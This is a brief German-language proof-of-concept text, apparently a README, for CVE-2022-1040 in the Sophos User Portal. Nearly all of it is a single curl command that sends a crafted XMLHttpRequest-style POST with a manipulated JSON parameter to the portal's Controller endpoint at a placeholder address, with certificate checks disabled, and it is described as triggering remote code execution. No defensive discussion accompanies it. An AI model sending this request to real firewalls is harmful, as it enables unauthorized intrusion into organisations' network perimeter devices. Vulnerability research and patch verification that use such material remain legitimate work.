
Proof-of-Concept-Exploit für CVE-2022-1040, das das Sophos User Portal mit einer manipulierten XMLHttpRequest-POST-Anfrage angreift, um Remote-Code-Ausführung auszulösen.
Möge der poc mit dir sein
curl --insecure -H "X-Requested-With: XMLHttpRequest" -X POST 'https://x.x.x.x/userportal/Controller?mode=8700&operation=1&datagrid=179&json=\{"🦞":"test"\}'